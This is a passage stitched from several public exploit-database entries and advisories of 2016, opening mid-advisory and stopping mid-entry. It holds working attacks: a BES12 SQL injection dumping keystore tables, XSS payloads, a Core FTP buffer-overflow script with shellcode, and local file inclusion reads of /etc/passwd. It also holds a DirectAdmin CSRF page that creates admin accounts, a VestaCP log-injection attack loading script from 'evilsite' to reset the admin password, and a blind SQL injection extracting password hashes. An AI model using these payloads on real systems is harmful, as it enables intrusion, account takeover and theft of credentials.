serialise the entire table into an XML document which is returned in the
HTTP response as UTF-16 without the leading BOM (byte order mark)
causing most text editors to fail to display the response correctly.
https://<server>/mydevice/client/image?imageName=ui.cobranded.login.logo'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,(SELECT+*+FROM+obj_keystore_entry+FOR+XML+PATH(''))+--
The technique above can be used to download any database table available
to the BES12 database user.
Notable database tables are:
* obj_user which contains BES12 user details.
* obj_user_authentication which contains authentication tokens.
* obj_user_device which based on column names, contains enrolment
tokens, enrolment secrets and device encryption keys.
It is unclear if this information is sufficient to decrypt a lost/stolen
BES12 mobile device.
*Reflected Cross Site Scripting*
Two areas of the self-service web application exist where user-supplied
input is reflected directly in web pages, allowing a malicious user to
conduct Cross Site Scripting (XSS) attacks against users of the
application. While the application uses the HttpOnly cookie flag for
session tokens, successful exploitation allows malicious JavaScript to
perform any action within the application that the targeted user is able
to. The administrative web application is typically hosted on the same
domain and may be attacked using these XSS vectors, although this is
BES12 deployment specific.
The table below details where Cross Site Scripting was detected and
which parameters are vulnerable:
https://<server>/mydevice/index.jsp?locale="><script>alert(1)</script>
https://<server>/mydevice/loggedOut.jsp?locale="><script>alert(1)</script>
+----------+
| Solution |
+----------+
Upgrade to BES12.4.
+-------------------+
|Disclosure Timeline|
+-------------------+
Initial disclosure to Blackberry – 19 Nov 2015
Disclosure receipt confirmed by Blackberry – 19 Nov 2015
Request for update from Blackberry – 7 Dec 2015
Vulnerabilities confirmed by Blackberry – 8 Dec 2015
Blackberry confirms fixes will be released as part of BES12.4 – 28 Jan 2016
BES12.4 released – 29 Jan 2016
Advisory released – 15 Feb 2016
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is a leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients
include some of the largest globally recognised companies in areas such
as finance, telecommunications, broadcasting, legal and government. Our
aim is to provide the very best independent advice and a high level of
technical expertise while creating long and lasting professional
relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info@security-assessment.com
Source: https://code.google.com/p/google-security-research/issues/detail?id=656
The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==5092==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f72db15e078 at pc 0x7f72cffb364f bp 0x7ffe98a8b690 sp 0x7ffe98a8b688
READ of size 4 at 0x7f72db15e078 thread T0
#0 0x7f72cffb364e in dissect_oml_attrs wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17
#1 0x7f72cffb3286 in dissect_oml_fom wireshark/epan/dissectors/packet-gsm_abis_oml.c:1799:11
#2 0x7f72cffb2cbe in dissect_abis_oml wireshark/epan/dissectors/packet-gsm_abis_oml.c:1861:13
#3 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#4 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#5 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#6 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#7 0x7f72cf11e344 in call_dissector wireshark/epan/packet.c:2692:9
#8 0x7f72cffc53b7 in dissect_ipa wireshark/epan/dissectors/packet-gsm_ipa.c:333:5
#9 0x7f72cffc4dab in dissect_ipa_tcp wireshark/epan/dissectors/packet-gsm_ipa.c:376:2
#10 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#11 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#12 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#13 0x7f72d10c59dd in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4615:9
#14 0x7f72d10cb043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
#15 0x7f72d10c639c in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
#16 0x7f72d10db7a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
#17 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#18 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#19 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#20 0x7f72d022188b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#21 0x7f72d022c2b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#22 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#24 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x7f72cf114964 in dissector_try_uint wireshark/epan/packet.c:1174:9
#26 0x7f72cfd3348d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#27 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#28 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#29 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#30 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#31 0x7f72cfd2f725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#32 0x7f72cfd27f33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#33 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#35 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#36 0x7f72cfe235f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#37 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#38 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#39 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#40 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#41 0x7f72cf10f33b in dissect_record wireshark/epan/packet.c:501:3
#42 0x7f72cf0bd3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#43 0x5264eb in process_packet wireshark/tshark.c:3728:5
#44 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#45 0x515daf in main wireshark/tshark.c:2197:13
0x7f72db15e078 is located 0 bytes to the right of global variable 'nm_att_tlvdef_base' defined in 'packet-gsm_abis_oml.c:1356:30' (0x7f72db15d880) of size 2040
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17 in dissect_oml_attrs
Shadow bytes around the buggy address:
0x0feedb623bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0feedb623c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9]
0x0feedb623c10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0feedb623c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5092==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11825. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39482.zip
#-*- coding: utf-8 -*-
#
# Exploit Title : Core FTP Server v1.2 - BufferOverflow POC
# Date: 2016-02-22
# Author: INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# GitHub : binsect00
# Blog : http://binsect00.tistory.com
# Vendor Homepage : http://www.coreftp.com/
# Software Link:
# Version: 1.2
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
'''
[+] Type : Buffer overflow
[+] Detail :
[-] The vulnerability has the most typical Buffer overflow vulnerabilities.
[-] Insert string into 'Log filename(include path)' field that [setup] - [new] - [Logging options] - [More]
[-] 'Log filename(include path)' field is no limit to the length and does not check the length
[-] Insert string "A"*1500 and press Ok, OK
[-] crash info
(3bc.e28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000111 ecx=41414141 edx=0012a3d9 esi=00502438 edi=00000001
eip=41414141 esp=00129bf0 ebp=00129bf8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
41414141 ?? ???
'''
import struct
junk = "A" * 312
EIP = struct.pack("<L",0x7795163b) # USER32!gSharedInfo+0x181fb:
# 7795163b ffe4 jmp esp
nop = "\x90" * 10
#windows/exec calc.exe
#encode : alpha_mixed
sehll = (
"\x89\xe5\xdb\xde\xd9\x75\xf4\x59\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
"\x75\x4a\x49\x59\x6c\x68\x68\x6f\x72\x67\x70\x77\x70\x47" +
"\x70\x75\x30\x6f\x79\x4a\x45\x44\x71\x49\x50\x30\x64\x6c" +
"\x4b\x56\x30\x34\x70\x4e\x6b\x61\x42\x56\x6c\x6c\x4b\x71" +
"\x42\x77\x64\x4c\x4b\x32\x52\x67\x58\x76\x6f\x6c\x77\x71" +
"\x5a\x31\x36\x65\x61\x49\x6f\x4e\x4c\x67\x4c\x53\x51\x61" +
"\x6c\x37\x72\x44\x6c\x47\x50\x4f\x31\x38\x4f\x54\x4d\x36" +
"\x61\x58\x47\x58\x62\x69\x62\x46\x32\x51\x47\x6c\x4b\x61" +
"\x42\x46\x70\x6c\x4b\x52\x6a\x75\x6c\x6e\x6b\x42\x6c\x34" +
"\x51\x30\x78\x79\x73\x72\x68\x65\x51\x7a\x71\x30\x51\x6c" +
"\x4b\x53\x69\x57\x50\x43\x31\x58\x53\x4c\x4b\x62\x69\x76" +
"\x78\x58\x63\x75\x6a\x37\x39\x4c\x4b\x75\x64\x6c\x4b\x36" +
"\x61\x4e\x36\x54\x71\x69\x6f\x6e\x4c\x5a\x61\x5a\x6f\x54" +
"\x4d\x43\x31\x58\x47\x45\x68\x59\x70\x32\x55\x4b\x46\x64" +
"\x43\x51\x6d\x58\x78\x45\x6b\x31\x6d\x55\x74\x50\x75\x48" +
"\x64\x42\x78\x6c\x4b\x32\x78\x77\x54\x67\x71\x38\x53\x63" +
"\x56\x4c\x4b\x66\x6c\x62\x6b\x6e\x6b\x52\x78\x35\x4c\x63" +
"\x31\x68\x53\x6e\x6b\x45\x54\x4c\x4b\x46\x61\x5a\x70\x6c" +
"\x49\x47\x34\x65\x74\x31\x34\x61\x4b\x31\x4b\x75\x31\x43" +
"\x69\x52\x7a\x36\x31\x6b\x4f\x59\x70\x73\x6f\x63\x6f\x32" +
"\x7a\x4c\x4b\x45\x42\x78\x6b\x6e\x6d\x43\x6d\x31\x7a\x63" +
"\x31\x6c\x4d\x6c\x45\x4e\x52\x75\x50\x77\x70\x47\x70\x50" +
"\x50\x63\x58\x66\x51\x4e\x6b\x62\x4f\x6b\x37\x6b\x4f\x7a" +
"\x75\x6f\x4b\x4c\x30\x68\x35\x6f\x52\x61\x46\x43\x58\x69" +
"\x36\x7a\x35\x4d\x6d\x4f\x6d\x69\x6f\x68\x55\x65\x6c\x56" +
"\x66\x33\x4c\x37\x7a\x4d\x50\x49\x6b\x79\x70\x51\x65\x37" +
"\x75\x4f\x4b\x31\x57\x75\x43\x61\x62\x70\x6f\x73\x5a\x73" +
"\x30\x46\x33\x39\x6f\x6a\x75\x70\x63\x45\x31\x42\x4c\x63" +
"\x53\x74\x6e\x71\x75\x31\x68\x73\x55\x57\x70\x41\x41"
)
payload = junk + EIP + nop + sehll
with open("CoreFTPServer_Ex.txt","wb") as f :
f.write(payload)
Document Title:
===============
InstantCoder v1.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1738
Release Date:
=============
2016-02-22
Vulnerability Laboratory ID (VL-ID):
====================================
1738
Common Vulnerability Scoring System:
====================================
7
Product & Service Introduction:
===============================
You are one of the best developers in the world and you would like to code anytime, anywhere. CuteCoder makes it possible
for your to code and debug web apps on your lovely iPhone and iPad.
(Copy of the Homepage: https://itunes.apple.com/ai/app/instantcoder/id1067517686 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered multiple vulnerabilities in the official InstantCoder mobile iOS web-application.
Vulnerability Disclosure Timeline:
==================================
2016-02-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Shumin Sun
Product: InstantCoder - iOS (Web-Application) 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
The file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `./toolkit/upload` module. Remote attackers are able to inject own
files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local
file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to
inject the lfi payload by usage of the wifi interface or local file sync function.
Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] ./toolkit/upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
1.2
A directory traversal web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
The vulnerability allows remote attackers to unauthorized access path variables to compromise the web-application or mobile device.
The directory traversal web vulnerability is located in the `path` value of the `listFiles` module. Remote attackers are able to
manipulate the path variable GET or POST method request to compromise the application. The request method to inject the payload is
POST and the request method to execute is GET. The attack vector of the vulnerability is located on the application-side. The path
variable is not encoded or parsed. Thus allows an attacker to inject to unauthorized access the local system or app path.
The security risk of the path traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.0.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application (wifi ui) user account.
Successful exploitation of the path traversal vulnerability results in mobile application compromise or compromise of connected device components.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] ./listFiles
Vulnerable Parameter(s):
[+] path
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payload
http://localhost:8080/toolkit/index.html./[LOCAL FILE INCLUDE VULNERABILITY!]
PoC: Vulnerable Source
javascript:changePath("./[LOCAL FILE INCLUDE VULNERABILITY!]");
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/toolkit/upload?path= Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Content-Length[819]
Content-Type[multipart/form-data; boundary=---------------------------29343138867419]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------29343138867419
Content-Disposition: form-data; name="path"
-----------------------------29343138867419
Content-Disposition: form-data; name="upload1"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:8080/toolkit/index.html Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[4995] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Accept-Ranges[bytes]
Content-Length[4995]
Date[Mon, 22 Feb 2016 08:33:04 GMT]
Reference(s):
http://localhost:8080/toolkit/upload
http://localhost:8080/toolkit/index.html
1.2
Thedirectory traversal web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payload
http://localhost:8080/listFiles?path=./.././../../../../../../../../../../
PoC: Vulnerable Source
<p></p>
<div id="list-file"><a href="javascript:changePath("/.././../../../../../../../../../../etc/%00");">
<div class="folder"><img><iframe></div></a></iframe></div></a></div>
</div>
Status: 200[OK]
POST http://localhost:8080/listFiles?path=/ Load Flags[LOAD_BACKGROUND VALIDATE_ALWAYS LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[162]
Date[Mon, 22 Feb 2016 08:09:34 GMT]
-
Status: 200[OK]
POST http://localhost:8080/listFiles?path=/.././../../../../../../../../../../etc/%00 Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[2]
Date[Mon, 22 Feb 2016 08:09:37 GMT]
-
Status: 200[OK]
POST http://localhost:8080/listFiles?path=./.././../../../../../../../../../../ Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[2]
Date[Mon, 22 Feb 2016 08:09:45 GMT]
Reference(s):
http://localhost:8080/listFiles
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.7)
1.2
The security risk of the directory traversal web vulnerability in the list path GET method request is estimated as high. (CVSS 7.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
Title: SOLIDserver <=5.0.4 - Local File Inclusion Vunerability
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: SOLIDserver
Tested Version: : 5.0.4 and 4.0.2
Vendor: efficient IP http://www.efficientip.com
Google Dork: SOLIDserver login
Date: 17 Feb 2016
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
About Product :
---------------
EfficientIP's IP Address Management (IPAM) solution adapts to business and IT goals and objectives by allowing the creation of specific IPAM and VLANs deployment processes.
SOLIDserver™ IPAM is a unified solution that allows you to design, deploy, and manage the IP addressing plan automatically applying allocation rules and simplifying deployments.
Vulnerability Details:
----------------------
Based on a code review done on the product , this product doesn't have any observation on some parameters, that make the attacker able to read file contents.
PoC 1:
-----
https://www.site.com/mod/system/report_download.php?report_filename=/etc/passwd
or
view-source:https://www.site.com/mod/system/report_download.php?report_filename=../../../../../../../../../../../../etc/passwd
PoC 2 : [login authentication required]
------
https://www.site.com/mod/generic/download_config_file.php?config_file=../../../../../../../../../../../../../../etc/hosts
#EOF
Source: https://code.google.com/p/google-security-research/issues/detail?id=633
The attached flv file causes stack corruption when loaded into Flash. To use the PoC, load LoadMP42.swf?file=lownull.flv from a remote server.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39466.zip
=============================================================================
# Title : DirectAdmin (1.491) CSRF Vulnerability
# Date : 27-10-2014 updated 18-02-2016
# Version : >=1.491
# Author : Necmettin COSKUN =>@babayarisi
# Blog :http://ha.cker.io
# Vendor : http://www.directadmin.com/
# Download: http://www.directadmin.com/demo.html
=============================================================================
# info : DirectAdmin is a web-based hosting control panel.
#As you can see original form doesn't include csrf protection or any secret token.
<form name=reseller action="CMD_ACCOUNT_ADMIN" method="post" onSubmit="return formOK()">
<input type=hidden name=action value=create>
<tr><td class=list>Username:</td><td class=list><input type=text name=username maxlength=12 onChange="checkName()"></td></tr>
<tr><td class=list>E-Mail:</td><td class=list><input type=text name=email onChange="checkEmail()"></td></tr>
<tr><td class=list>Enter Password:</td><td class=list><input type=password name=passwd> <input type=button value="Random" onClick="randomPass()"></td></tr>
<tr><td class=list>Re-Enter Password:</td><td class=list><input type=password name=passwd2 onChange="checkPass()"></td></tr>
<tr><td class=list>Send Email Notification:</td><td class=list><input type=checkbox value="yes" name=notify checked> <a href="javascript:showAdminMessage();">Edit Admin Message</a></td></tr>
<tr><td td class=listtitle colspan=3 align=right>
<input type=submit value="Submit">
</td></tr>
</form>
#POC
<html>
<head>
<title>POC</title>
</head>
<script language="javascript">
function yurudi(){
var adress ="www.demo.com";
var username="demo";
var email ="demo@demo.com";
var password="12345";
var urlson="https://"+adress+":2222/CMD_ACCOUNT_ADMIN?action=create&username="+username+"&email="+email+"&passwd="+password+"&passwd2="+password;
document.getElementById("resim").src=urlson;
}
</script>
<body onload="yurudi()">
<img id="resim" src="" style="height:0px;width:0px;"></img>
</body>
</html>
#POC
# don't be evil!
Discovered by:
================
Necmettin COSKUN |GrisapkaGuvenlikGrubu|4ewa2getha!
# Exploit Title :Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability
# Vendor Homepage :http://www.vestacp.com
# Version :0.9.8-15
# Exploit Author :Necmettin COSKUN @babayarisi
# Blog :http://ha.cker.io
# Discovery date :16/02/2016
# Tested on :Fedora23 - Chrome/Firefox/Maxthon
We can use user-agent information to attack website like this.
First of all we change our user-agent and add some dangerous javascript code ( XSS etc. )
and then we request to one of the website on target server then it is saved on access.log by server
so when Administrator reads it the javascript code works that we added our user-agent information.
Poc Exploit
================
1.Prepare evil js file
function csrfWithToken(url,hanimisToken,password){
$.get(url, function(gelen) {
$('body').append($(gelen));
$('form[id="vstobjects"]').css("display","none");
var token = $(hanimisToken).attr("token");
$('form[id="vstobjects"]').attr("action",url);
$('input[name="v_password"]').val(password);
$('form[id="vstobjects"]').submit();
});
};
//password = 1234567
csrfWithToken("/edit/user/?user=admin","#token","123456");
2. Make a Get request with evil user-agent to victim server
wget --header="Accept: text/html" --user-agent="<script src='http://evilsite/evil.js'></script>" http://victimserver
3. We wait Administrator to read access.log that injected our evil.js
4. We log-in VestaCP via password we changed
http(s)://victim:8083/
Discovered by:
================
Necmettin COSKUN |GrisapkaGuvenlikGrubu|4ewa2getha!
Source: https://code.google.com/p/google-security-research/issues/detail?id=609
The attached fuzz test case causes a crash due to a heap overflow in BitmapData.drawWithQuality.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39467.zip
# Exploit Title: Tiny Tiny RSS Blind SQL Injection
# Date: 15-02-2016
# Software Link: http://tt-rss.org/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
$item_id inside process_category_order() is not properly escaped.
We control this value using $_POST['payload'].
http://security.szurek.pl/tiny-tiny-rss-blind-sql-injection.html
2. Proof of Concept
Login as regular user.
<form method="post" action="http://tiny-tiny-rss/backend.php">
<input type="hidden" name="op" value="pref-feeds">
<input type="hidden" name="method" value="savefeedorder">
<textarea name="payload">{"items":[{"items":{"_reference":"CAT:1' AND order_id = (SELECT IF(substr(pwd_hash,1,1) = CHAR(77), SLEEP(5), 0) FROM ttrss_users WHERE id = 1) AND -- "},"id":"root"}]}</textarea>
<input type="submit" value="Hack!">
</form>
3. Solution:
Update to version a5556c2471973e292dce615fe0c77fdbbc54405b
#-*- coding: utf-8 -*-
#
# Exploit Title: Network Scanner Version 4.0.0.0 SEH Crash POC
# POC Dork: N/A
# Date: 2016-02-15
# Author: INSECT.B
# Twitter : @INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# Blog : http://binsect00.tistory.com
# Vendor Homepage: http://www.mitec.cz/
# Software Link: http://www.mitec.cz/Downloads/NetScan.zip
# Version: 4.0.0.0
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
'''
[+] Type : SEH
[-] Insert the string that compile this file in [TOOLS] Tab 'Detect IP from Host name...' field
